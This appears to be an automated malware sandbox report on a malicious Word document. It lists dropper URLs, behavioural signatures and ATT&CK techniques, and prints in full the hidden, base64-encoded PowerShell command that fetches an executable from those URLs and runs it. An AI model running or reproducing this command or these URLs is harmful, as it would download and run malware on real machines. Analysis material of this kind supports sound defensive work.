c15e005ca7af90c7fddc7fe79b646e5b520fa94946e4f62f4ace5de94b37887a

General

Target

c15e005ca7af90c7fddc7fe79b646e5b520fa94946e4f62f4ace5de94b37887a
Sample

191219-tbv8cjlg72
SHA256

c15e005ca7af90c7fddc7fe79b646e5b520fa94946e4f62f4ace5de94b37887a

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://proyectoin.com/sushi/vipulg5517/

exe.dropper

http://reklamturk.net/wwvv2/n6d810122/

exe.dropper

http://radioyachting.com/thumbs/na1t448/

exe.dropper

http://redironmarketing.com/oscommerce/kisbe16464/

exe.dropper

http://wolfinpigsclothing.com/cgi-bin/a2s830/

Signatures

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4668	Powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4668	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4980	WINWORD.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4980	WINWORD.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4980	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4668	1504	Powershell.exe	74

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c15e005ca7af90c7fddc7fe79b646e5b520fa94946e4f62f4ace5de94b37887a.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4980

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABXAHcAbQB0AHcAcABtAHkAbAB1AG4APQAnAEwAbAB0AHkAdQBsAHAAaAAnADsAJABIAGcAYwBsAHgAYwBuAHIAeAB2ACAAPQAgACcANAAwACcAOwAkAEYAegBuAG8AYQBlAG0AegA9ACcATQB6AHEAaQBwAG0AZQByAGEAbgAnADsAJABVAGUAeABpAHYAZABiAGwAYgByAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAGcAYwBsAHgAYwBuAHIAeAB2ACsAJwAuAGUAeABlACcAOwAkAEsAbQByAHUAdABkAGoAaQBmAD0AJwBMAG8AeABiAHkAeQBnAGgAbwAnADsAJABNAG8AYwBpAHIAagBrAHIAZQBpAGYAawA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAYgBjAGwASQBFAG4AdAA7ACQAVQBhAGgAYQBlAG0AaABlAGkAYQB4AHQAPQAnAGgAdAB0AHAAOgAvAC8AcAByAG8AeQBlAGMAdABvAGkAbgAuAGMAbwBtAC8AcwB1AHMAaABpAC8AdgBpAHAAdQBsAGcANQA1ADEANwAvACoAaAB0AHQAcAA6AC8ALwByAGUAawBsAGEAbQB0AHUAcgBrAC4AbgBlAHQALwB3AHcAdgB2ADIALwBuADYAZAA4ADEAMAAxADIAMgAvACoAaAB0AHQAcAA6AC8ALwByAGEAZABpAG8AeQBhAGMAaAB0AGkAbgBnAC4AYwBvAG0ALwB0AGgAdQBtAGIAcwAvAG4AYQAxAHQANAA0ADgALwAqAGgAdAB0AHAAOgAvAC8AcgBlAGQAaQByAG8AbgBtAGEAcgBrAGUAdABpAG4AZwAuAGMAbwBtAC8AbwBzAGMAbwBtAG0AZQByAGMAZQAvAGsAaQBzAGIAZQAxADYANAA2ADQALwAqAGgAdAB0AHAAOgAvAC8AdwBvAGwAZgBpAG4AcABpAGcAcwBjAGwAbwB0AGgAaQBuAGcALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBhADIAcwA4ADMAMAAvACcALgAiAHMAcABgAEwAaQBUACIAKAAnACoAJwApADsAJABaAGwAZABxAGYAegBrAHEAYQBiAGoAPQAnAEIAdwBmAGwAagBwAHgAZQByAHMAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAWgBnAG4AaAB4AG0AeABoAGgAawBsAHIAbwAgAGkAbgAgACQAVQBhAGgAYQBlAG0AaABlAGkAYQB4AHQAKQB7AHQAcgB5AHsAJABNAG8AYwBpAHIAagBrAHIAZQBpAGYAawAuACIARABPAHcAbgBgAGwAYABvAGAAQQBkAEYASQBMAEUAIgAoACQAWgBnAG4AaAB4AG0AeABoAGgAawBsAHIAbwAsACAAJABVAGUAeABpAHYAZABiAGwAYgByACkAOwAkAEsAZwBzAHQAZwBkAHIAdQBuAGYAcgBkAD0AJwBZAG8AdQBmAGIAcQBpAGEAYgBzACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVQBlAHgAaQB2AGQAYgBsAGIAcgApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMwA2ADIAMAA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAUgBUACIAKAAkAFUAZQB4AGkAdgBkAGIAbABiAHIAKQA7ACQAUwBsAGgAdAB5AHYAbgBvAGUAeQBnAHUAZwA9ACcATgBxAG8AaQBsAGYAegBwAHcAbQBkAGQAJwA7AGIAcgBlAGEAawA7ACQARQBhAHkAaQBlAHoAaQBmAG0AcwA9ACcAVgB0AHEAbgBrAHYAagBvAG0AbAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAHUAdAB3AGwAaAB1AHMAZABlAD0AJwBJAG0AYwBoAGwAaQBlAHYAYQBiAGoAZgB6ACcA
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
PID:4668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4980-2-0x000001D9E4EB2000-0x000001D9E4EBB000-memory.dmp

Filesize
36KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads